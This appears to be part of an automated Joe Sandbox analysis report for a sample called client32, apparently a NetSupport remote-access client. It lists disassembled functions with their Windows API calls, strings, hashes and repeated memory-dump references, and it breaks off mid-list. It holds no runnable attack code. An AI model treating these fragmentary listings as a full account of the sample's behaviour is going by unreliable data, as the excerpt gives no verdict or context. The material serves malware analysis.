                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                                                                                                                • String ID: CltReplay.cpp$hMenu$hSub
                                                                                                                                                                                • API String ID: 468487828-3658427034
                                                                                                                                                                                • Opcode ID: 2fc38f12fa1dce61fb1016a2f29d28e20b6016e754e92117cec7025d9621adcd
                                                                                                                                                                                • Instruction ID: a1172c67e56a59a7e7aecb66417adfcb043f930a412e9b1dc59223c97985c55e
                                                                                                                                                                                • Opcode Fuzzy Hash: 2fc38f12fa1dce61fb1016a2f29d28e20b6016e754e92117cec7025d9621adcd
                                                                                                                                                                                • Instruction Fuzzy Hash: 54E02B3EFC0E7A33C6916AB23D4EFCFB9444B8065EF040021F936B6644E918A10186E9
                                                                                                                                                                                Function 11027580 Relevance: 9.1, APIs: 6, Instructions: 70threadwindowsleepCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • PostThreadMessageA.USER32(00000000,00000501,?,00000000), ref: 110275D2
                                                                                                                                                                                • Sleep.KERNEL32(00000032), ref: 110275D6
                                                                                                                                                                                • PostThreadMessageA.USER32(00000000,00000012,00000000,00000000), ref: 110275F7
                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,00000032), ref: 11027602
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 11027614
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,00000000,00000000), ref: 11027641
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessagePostThread$CloseFreeHandleLibraryObjectSingleSleepWait
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2375713580-0
                                                                                                                                                                                • Opcode ID: 54010ad89619036a9f5f7e249c6b124c24f5beaaaeecc29df3c9cd4aab94af2e
                                                                                                                                                                                • Instruction ID: 5d0aa2bc238e72ac38ea6d9656cf733a88b5b02fa80378034871cbc9b64e3e84
                                                                                                                                                                                • Opcode Fuzzy Hash: 54010ad89619036a9f5f7e249c6b124c24f5beaaaeecc29df3c9cd4aab94af2e
                                                                                                                                                                                • Instruction Fuzzy Hash: B1217C71A43735DBE612CBD8CCC4A76FBA8AB58B18B40013AF524C7288C770A441CF91
                                                                                                                                                                                Function 1113D790 Relevance: 9.0, APIs: 6, Instructions: 49synchronizationthreadCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11050128,00000000), ref: 1113D7C5
                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,1113D660,00000000,00000000,00000000), ref: 1113D7E0
                                                                                                                                                                                • SetEvent.KERNEL32(00000000,00000000,?,11050128,00000000), ref: 1113D805
                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,00001388,?,11050128,00000000), ref: 1113D816
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,11050128,00000000), ref: 1113D829
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,11050128,00000000), ref: 1113D83C
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseCreateEventHandle$ObjectSingleThreadWait
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 414154005-0
                                                                                                                                                                                • Opcode ID: 254c25c95f36225789ab582df44d250993c27ed63b68ed0c4c323ac941b1d095
                                                                                                                                                                                • Instruction ID: 02350ad9304c652d5973a468123ac0969e3fb67a745117c4f7e49a1723ee0a3b
                                                                                                                                                                                • Opcode Fuzzy Hash: 254c25c95f36225789ab582df44d250993c27ed63b68ed0c4c323ac941b1d095
                                                                                                                                                                                • Instruction Fuzzy Hash: 9F11CE705C8265AAF7298BE5C9A8B95FFA4934631DF50402AF2389658CCBB02088CB54
                                                                                                                                                                                Function 1103B630 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 180COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,0000045F,00000000,?,00000000), ref: 1103B75F
                                                                                                                                                                                  • Part of subcall function 110CC330: GetCurrentThreadId.KERNEL32 ref: 110CC339
                                                                                                                                                                                  • Part of subcall function 110CEEB0: CreateDialogParamA.USER32(00000000,?,1111A32B,110CC170,00000000), ref: 110CEF41
                                                                                                                                                                                  • Part of subcall function 110CEEB0: GetLastError.KERNEL32 ref: 110CF099
                                                                                                                                                                                  • Part of subcall function 110CEEB0: wsprintfA.USER32 ref: 110CF0C8
                                                                                                                                                                                • GetWindowTextA.USER32(?,?,000000C8), ref: 1103B81E
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateCurrentDialogErrorFileLastModuleNameParamTextThreadWindowwsprintf
                                                                                                                                                                                • String ID: Survey$pcicl32.dll$toastImageAndText.png
                                                                                                                                                                                • API String ID: 2477883239-2305317391
                                                                                                                                                                                • Opcode ID: ee0954db72cab87163b07040d28d3321718c2e1015c56eb6e357f402edd756c6
                                                                                                                                                                                • Instruction ID: 7dbccef9bc38e03ce487eaa09cfd981c9e21dda13d8821a86742dc69a6eb99c6
                                                                                                                                                                                • Opcode Fuzzy Hash: ee0954db72cab87163b07040d28d3321718c2e1015c56eb6e357f402edd756c6
                                                                                                                                                                                • Instruction Fuzzy Hash: 5661C07890465A9FE709CF64C8D4FEAB7F5EF48308F1085A9D52A8B391EB31E944CB50
                                                                                                                                                                                Function 1103B469 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 114COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1103B49C
                                                                                                                                                                                • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?), ref: 1103B4C2
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DirectoryFolderPathSystem
                                                                                                                                                                                • String ID: "%PROG%$%SYS%$c:\program files
                                                                                                                                                                                • API String ID: 2964528113-3967668164
                                                                                                                                                                                • Opcode ID: 21d7fe8bdbcbbbeb7c949734e58a662819277103a52b017102202db336a2647b
                                                                                                                                                                                • Instruction ID: 1beb3ec06c52cebf7cdf59fed39cf9a477bc7fc2ab90d70df5bf6d0fd168e28b
                                                                                                                                                                                • Opcode Fuzzy Hash: 21d7fe8bdbcbbbeb7c949734e58a662819277103a52b017102202db336a2647b
                                                                                                                                                                                • Instruction Fuzzy Hash: EA313735E0855A4FCB29CE349C94BEEB7E5EF85309F0041E8D89AD7744EB755944CB80
                                                                                                                                                                                Function 110773B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 111COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • MapWindowPoints.USER32(?,00000000,?,00000002), ref: 110773FB
                                                                                                                                                                                  • Part of subcall function 11076740: DeferWindowPos.USER32(8B000EB5,00000000,BEE85BC0,33CD335E,?,00000000,33CD335E,11077496), ref: 11076783
                                                                                                                                                                                • EqualRect.USER32(?,?), ref: 1107740C
                                                                                                                                                                                • SetWindowPos.USER32(00000000,00000000,?,33CD335E,BEE85BC0,8B000EB5,00000014,?,?,?,?,?,110775EA,00000000,?), ref: 11077466
                                                                                                                                                                                Strings
                                                                                                                                                                                • m_hWnd, xrefs: 11077447
                                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11077442
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Window$DeferEqualPointsRect
                                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                • API String ID: 2754115966-2830328467
                                                                                                                                                                                • Opcode ID: 6fc22f6046c672a358e667cf2f5770c3ce2dfaba730fefd1aff9339eb2f3915c
                                                                                                                                                                                • Instruction ID: 7762f9a6a2ed7d341f2943c2e7d232384b1531e6a197bbc7c1a3da1ffe608ad4
                                                                                                                                                                                • Opcode Fuzzy Hash: 6fc22f6046c672a358e667cf2f5770c3ce2dfaba730fefd1aff9339eb2f3915c
                                                                                                                                                                                • Instruction Fuzzy Hash: 74414B74A006099FDB14CF98C885EAABBF5FF48704F108569EA55AB344DB70A800CFA4
                                                                                                                                                                                Function 11179775 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103COMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 111797A9
                                                                                                                                                                                • __isleadbyte_l.LIBCMT ref: 111797DC
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,50036AD0,00BFBBEF,00000000,?,?,?,1117A3D8,00000109,00BFBBEF,00000003), ref: 1117980D
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,1117A3D8,00000109,00BFBBEF,00000003), ref: 1117987B
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                • String ID: H$
                                                                                                                                                                                • API String ID: 3058430110-3767711040
                                                                                                                                                                                • Opcode ID: 8a143442f0c1ddc808179669c8bda0f547e04561d024046af250b3c99ddd2ce0
                                                                                                                                                                                • Instruction ID: dd7da2bd4d1e27f38930cbdbffb8ca2b0741d821671db88b966082c1cf8912a5
                                                                                                                                                                                • Opcode Fuzzy Hash: 8a143442f0c1ddc808179669c8bda0f547e04561d024046af250b3c99ddd2ce0
                                                                                                                                                                                • Instruction Fuzzy Hash: 1331AE31A0029EEFEB01DF64C9849AEFFA6EF01330F1585A9E4648B290F730D954CB51
                                                                                                                                                                                Function 110ED7B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101registryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000,00000000,75C04C70), ref: 110ED801
                                                                                                                                                                                • _free.LIBCMT ref: 110ED81C
                                                                                                                                                                                  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                                                                                                                  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(000007FF,?,00000000,?,00000000,000007FF), ref: 110ED85A
                                                                                                                                                                                • _free.LIBCMT ref: 110ED8E3
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: QueryValue_free$ErrorFreeHeapLast
                                                                                                                                                                                • String ID: Error %d getting %s
                                                                                                                                                                                • API String ID: 3888477750-2709163689
                                                                                                                                                                                • Opcode ID: c5de73fd52ea68c520e2a1191923082e935b74678c79a71451270fddafe1b31d
                                                                                                                                                                                • Instruction ID: 02eced05e3356085969bcbe05084d5abf0c2b7b1903d0388d20c61e7be7eac91
                                                                                                                                                                                • Opcode Fuzzy Hash: c5de73fd52ea68c520e2a1191923082e935b74678c79a71451270fddafe1b31d
                                                                                                                                                                                • Instruction Fuzzy Hash: F1318375D001289BDB60DA59CD84BEEB7F9EF54314F0481E9E88DA7240DE706E89CBD1
                                                                                                                                                                                Function 1102D750 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetVersion.KERNEL32(?,110500D4,00000000,00000000), ref: 1102D75C
                                                                                                                                                                                • InterlockedIncrement.KERNEL32(111EE418), ref: 1102D799
                                                                                                                                                                                • InterlockedDecrement.KERNEL32(111EE418), ref: 1102D7C0
                                                                                                                                                                                Strings
                                                                                                                                                                                • SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Enum, xrefs: 1102D7A6, 1102D7CC
                                                                                                                                                                                • EnableAudioHook(%d, %d), gCount=%d, xrefs: 1102D77F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Interlocked$DecrementIncrementVersion
                                                                                                                                                                                • String ID: EnableAudioHook(%d, %d), gCount=%d$SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Enum
                                                                                                                                                                                • API String ID: 1284810544-229394064
                                                                                                                                                                                • Opcode ID: fe3dc48e698ffd4a8d7334cc8b8c209b51da527230acf53cf6ffc60aeaae577d
                                                                                                                                                                                • Instruction ID: 926408d456050aac1ce0bfa7cc5ec849c80561d93592d3bffa921dc6a50aec96
                                                                                                                                                                                • Opcode Fuzzy Hash: fe3dc48e698ffd4a8d7334cc8b8c209b51da527230acf53cf6ffc60aeaae577d
                                                                                                                                                                                • Instruction Fuzzy Hash: 8801DB3AE425A956E70299D56C84F9DB7E9BF8162DFC00071FD2DD2A04F725A84043F1
                                                                                                                                                                                Function 11093410 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44registrywindowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetClassInfoA.USER32(1109350C,NSMClassList,?), ref: 11093424
                                                                                                                                                                                • LoadIconA.USER32(1109350C,00002716), ref: 11093456
                                                                                                                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 11093465
                                                                                                                                                                                • RegisterClassA.USER32(?), ref: 11093483
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
